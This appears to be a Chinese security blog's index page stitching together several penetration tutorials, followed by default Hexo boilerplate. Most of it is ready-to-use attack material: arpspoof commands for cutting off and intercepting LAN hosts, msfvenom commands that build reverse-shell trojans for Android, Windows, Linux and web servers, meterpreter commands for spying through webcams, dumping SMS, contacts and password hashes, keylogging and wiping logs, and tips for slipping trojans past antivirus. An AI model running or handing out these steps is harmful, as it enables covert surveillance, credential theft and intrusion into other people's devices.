˗ˋˏ♡ˎˊ˗

爱你所爱,行你所行,听从你心,无问西东。

0%

使用工具:arpspoof
什么是ARP?

  ARP(Address Resolution Protocol,地址解析协议)是一个位于TCP/IP协议栈中的 低层协议,负责将某个IP地址解析成对应的MAC地址。
什么是ARP欺骗?
 从影响网络连接通畅的方式来看,ARP欺骗分为两种,一种是对路由器ARP表的欺骗;另一种是对内网PC的网关欺骗。
 第一种ARP欺骗的原理是——截获网关数据。它通知路由器一系列错误的内网MAC地址,并按照一定的频率不断进行,使真实的地址信息无法通过更新保存在路由器中,结果路由器的所有数据只能发送给错误的MAC地址,造成正常PC无法收到信息。第二种ARP欺骗的原理是——伪造网关。它的原理是建立假网关,让被它欺骗的PC向假网关发数据,而不是通过正常的路由器途径上网。在PC看来,就是上不了网了,“网络掉线了”。
 实际上ARP欺骗是一种中间人攻击,攻击者通过毒化受害者的ARP缓存,将网关的MAC替换成攻击者的MAC,于是攻击者的主机实际上就充当了受害主机的网关,之后攻击者就可以截获受害者发出和接到的数据包,从中获取账号密码、银行卡信息等。



特别提示:
1、arpspoof是“Dsniff网络嗅探工具包“其中的一个工具;
2、使用arpspoof前内核“IP转发”功能(或完成相同的功能程序,例如fragrouter)必须提前打开。

 

一、ARP断网攻击用法

1.先ping目标主机,ping通的主机才能欺骗; 2.若是不知目标主机IP,那就先查看本机IP,比如本机是192.168.1.201; 3.可以用fping -asg 192.168.1.0/24查看局域网内所有存活的主机IP,推荐查看IP列表中存 活的IP,因为有的IP不能直接给出是存活的; 4.使用模板:arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host 即:arpspoof -i eth0 -t 192.168.1.201 192.168.1.1 5.如此就能使目标主机在ARP欺骗期间处于断网状态。
1
2
3
4
ifconfig
fping -asg 192.168.1.0/24
ping 192.168.1.201
arpspoof -i eth0 -t 192.168.1.201 192.168.1.1

提示:
-i interface 指定要使用的接口。
-c own|host|both 指定范围own|host|both(自己|主机|两者)。
-t target 指定一台特定主机为ARP中毒(如果未指定,则为LAN上的所有主机)。
-r
host 指定您希望拦截数据包的主机(通常是本地网关)。

 

二、开启流量转发

使目标的IP流量经过我的网卡,进行IP流量转发,让目标主机正常上网:

1.ARP欺骗之前先开启流量转发,使用echo 1 > /proc/sys/net/ipv4/ip_forward 2.使用命令:cat /proc/sys/net/ipv4/ip_forward,显示1表示成功开启转发功能,0表示未 开启; 3.另开一个窗口:arpspoof -i eth0 -t 192.168.1.201 192.168.1.1进行欺骗; 4.若目标主机能正常上网,则流量转发成功,否则流量转发未成功; 5.本机(虚拟机)就被靶机当成网关了(即实际网关和攻击主机的物理地址一样)
1
2
3
echo 1 > /proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.1.201 192.168.1.1

 
资源目录(点击相应资源会跳转哦)😜

书籍 提取码 视频 提取码
安全牛 — Kali Linux渗透测试(转录) Numb1 安全牛 — Kali Linux渗透测试(转录) Numb2
算法设计与分析课件 Numb3 Kali渗透培训课程-逆小战 Numb4
信息安全数学基础课件 Numb5 SQLMAP注入牛人讲解 Numb6
Java课件 Numb7 Burpsuite视频教程 Numb8
Java 2 核心技术,卷I:基础知识(原书第7版) Numb9 Burpsuite渗透软件教程 Numb10
Dreaming in Code Numb11 Web基础 Numb12
梦断代码 Numb13 Web漏洞讲解 Numb14

 
 

Metasploit之渗透安卓实战

 在之前的Metaspoloit使用中都是在Windows系统中,因为渗透的是Windows系统,所以选用了“windows/meterpreter/reverse_tcp”模块。 而这里需要渗透安卓系统了,就选用“android/meterpreter/reverse_tcp”模块。 那么对于kali-linux连接木马的方式还是和之前的一样,利用“exploit/multi/handler” 并且,同样需要选用“windows/meterpreter/reverse_tcp”的PAYLOAD 这里假设我的测试环境 kali-linux: 192.168.2.146 安卓模拟环境:192.168.2.107

 

一、生成远程安卓木马
msfconsole msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=4444 R > payload.apk

命令解析:
p 设置要使用的payload
LHOST 设置用来接收反弹连接的主机(kali-linux的IP)
LPORT 设置用来接收反弹连接的端口(kali-linux的端口)
R 设置文件格式
Location 要保存的文件位置–>/root/Desktop/是桌面,没有目录表示当前系统Home目录下
PS:对于目前的安卓系统安全机制的考虑,因为没有签名证书可能导致无法安装或易被受害者识破
那么,签名证书的制作可以查看参考文献资料

 

二、开启metasploit,并且开启相关连接
msfconsole use exploit/multi/handler set PAYLOAD android/meterpreter/reverse_tcp set LHOST 192.168.2.146 set LPORT 4444 exploit

 

三、meterpreter连接

 安卓手机安装并且打开木马后会返回我们一个meterpreter连接,那么我们可以使用以下的一些常用的命令:

cd -->目录切换,命令:cd / 切换到根目录 search -->搜索文件,命令:search text.jpg download -->下载文件,命令:download test.jpg webcam_list -->查看摄像头列表,因为手机都是前置和后置摄像头了 webcam_snap -->拍照一张,需要选用前置或者后置摄像头,命令:webcam_snap -i 1 webcam_stream -->开启摄像头视频监控,同上,命令:webcam_stream -i 1 安卓系统相关命令: check_root -->查看当前安卓是否已经root dump_calllog -->下载通话记录 dump_contacts -->下载短信记录 dump_sms -->下载通讯录 geolocate -->利用谷歌地图定位(需要安装谷歌地图)

 
 
 
 

 
 

msfpayload反弹shell使用的一些命令集

 

一、核心命令 – 帮助菜单

background – 将当前会话移动到背景变成一个session,当再次使用时再用sessions -i ID调用
bgkill – 杀死一个背景 meterpreter 脚本
bglist – 提供所有正在运行的后台脚本的列表
bgrun – 作为一个后台线程运行脚本
channel – 显示活动频道
close – 关闭通道
exit – 终止 meterpreter 会话
help – 帮助菜单
interact – 与通道进行交互
irb – 进入 Ruby 脚本模式
migrate – 移动到一个指定的 PID 的活动进程
quit – 终止 meterpreter 会话
read – 从通道读取数据
run – 执行以后它选定的 meterpreter 脚本
use – 加载 meterpreter 的扩展
write – 将数据写入到一个通道

二、文件系统命令

cat -读取并输出到标准输出文件的内容
cd -更改目录对受害人
del -删除文件对受害人
download-从受害者系统文件下载
edit-用 vim编辑文件
getlwd -打印本地目录
getwd -打印工作目录
lcd -更改本地目录
lpwd -打印本地目录
ls -列出在当前目录中的文件列表
mkdir -在受害者系统上的创建目录
pwd -输出工作目录
rm -删除文件
rmdir -受害者系统上删除目录
upload-从攻击者的系统往受害者系统上传文件

三、网络命令

portfwd -端口转发
route -查看或修改受害者路由表

四、系统命令

clearav -清除了受害者的计算机上的事件日志
drop_token -被盗的令牌
execute-执行命令
getpid -获取当前进程 ID (PID)
getprivs -尽可能获取尽可能多的特权
getuid -获取作为运行服务器的用户
kill -终止指定 PID 的进程
ps -列出正在运行的进程
reboot-重新启动受害人的计算机
reg -与受害人的注册表进行交互
rev2self -在受害者机器上调用 RevertToSelf()
shell -在受害者计算机上打开一个shell
shutdown-关闭了受害者的计算机
steal_token -试图窃取指定的 (PID) 进程的令牌
sysinfo -获取有关受害者计算机操作系统和名称等的详细信息

五、用户界面命令

enumdesktops -列出所有可访问台式机
getdesktop -获取当前的 meterpreter 桌面
idletime -检查长时间以来,受害者系统空闲进程
keyscan_dump -键盘记录软件的内容转储
keyscan_start -启动时与如 Word 或浏览器的进程相关联的键盘记录软件
keyscan_stop -停止键盘记录软件
screenshot-抓去 meterpreter 桌面的屏幕截图
set_desktop -更改 meterpreter 桌面
uictl -启用用户界面组件的一些控件

六、特权升级命令

getsystem -获得系统管理员权限

七、密码转储命令

hashdump -抓去哈希密码 (SAM) 文件中的值

八、Timestomp 命令

timestomp -操作修改,访问,并创建一个文件的属性

 
 
 

2019.2.26更新
最近有同学、朋友问我详细的Hexo+Github Pages Blog搭建,加之我把我这几个月来的一些使用技巧和方法总结一下。为什么要今天来更新一下呢?
因为26对我来说是个特别的日子…..

阅读全文 »

msfvenom生成各类Payload命令

Often one of the most useful(and to the beginner underrated) abilities of Metasploit is the msfpayload module. Multiple payloads can be created with this module and it helps something that can give you a shell in almost any situation. For each of these payloads you can go into msfconsole and select exploit/multi/handler. Run ‘set payload’ for the relevant payload used and configure all necessary options (LHOST, LPORT, etc). Execute and wait for the payload to be run. For the examples below it’s pretty self explanatory but LHOST should be filled in with your IP address(LAN IP if attacking within the network, WAN IP if attacking across the internet), and LPORT should be the port you wish to be connected back on.

Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe

Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho

PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php

cat shell.php | pbcopy && echo ‘<?php ‘ | tr -d ‘\n’ > shell.php && pbpaste >> shell.php

ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war Scripting Payloads

Python

msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py

Bash

msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh

Perl

msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl

Shellcode

For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.

Linux Based Shellcode

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f

Windows Based Shellcode

Your IP Address> LPORT= -f language “language放在<>里”

Mac Based Shellcode

msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f

Handlers模块

Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.

use exploit/multi/handler
set LHOST
set LPORT
exploit -j -z
Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘


&nbsp;
&nbsp;
下面以一个实例说明使用方法

Metasploit之我的远程控制软件
参考文献:Metasploit渗透测试笔记(Meterpreter篇

远程控制软件–>远控后门木马程序

木马程序–>控制端(攻击者)–>服务端(攻击目标)

测试环境:
攻击者:kali-linux –>192.168.2.146
受害者:Windows07 –>192.168.2.107

以下为kali-linux-2.0系统下的生成与连接方式(使用msfvenom命令的)
参考文献一
类似文献二

msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的ip LPORT=你的端口 -f exe -o payload.exe

以上就是基本命令,解释一下,-p后面是payload名称,然后是你的ip和端口(payload参数),然后是-f 格式,由于是实验就先设置exe,然后-o payload.exe指保存为payload.exe。当然,实验的时候可以把格式设置成exe,但是实战的时候毕竟有杀毒软件,所以格式最好是jar,jar就要求对方有java环境,可以用来拿java web网站的时候使用,或者设置成python然后自行shellcode免杀,即用Python容器,然后用AES混淆Python代码,再用pyinstaller编译exe,这是目前最完美的过杀毒软件方案,就连勒索软件都不会被杀毒软件干掉,除非有特殊动作,比如修改注册表。当然,楼主还有很多要学习。

具体步骤如下:

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=44444 -f exe -o test.exe            

–>在当前目录下生成木马程序test.exe,PS:生成payload.exe不会被杀,test.exe被秒杀

PS:之后的操作步骤是和上面的一样的↓

之后在metasploit下连接后门程序,步骤如下:

1
2
3
4
5
6
7
8
msfconsole                  -->开启metasploit
use exploit/multi/handler -->使用“exploit/multi/handler”这个模块连接后门程序
show options -->查看需要设置的配置信息//这里其实不需要配置任何信息的
set PAYLOAD windows/meterpreter/reverse_tcp -->使用tcp反向连接
show options -->查看需要设置的配置信息
set LHOST=192.168.2.146 -->设置我们攻击者自己的连接IP
set LPORT=44444 -->设置我们攻击浙自己的连接端口
exploit -->执行连接,等待木马执行后连接

PS:远程木马被执行后接着可以直接“shell”命令拿下shell

&nbsp;
&nbsp;
&nbsp;
&nbsp;
OK,完成了!
&nbsp;
&nbsp;

Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub.

Quick Start

Create a new post

1
$ hexo new "My New Post"

More info: Writing

Run server

1
$ hexo server

More info: Server

Generate static files

1
$ hexo generate

More info: Generating

Deploy to remote sites

1
$ hexo deploy

More info: Deployment

漏洞利用技术才是实施有效攻击的最核心技术,才是突破安全边界、实施深度入侵的关键所在。ʕ •ᴥ•ʔ (๑˃̵ᴗ˂̵) ପ( ˘ᵕ˘ ) ੭

阅读全文 »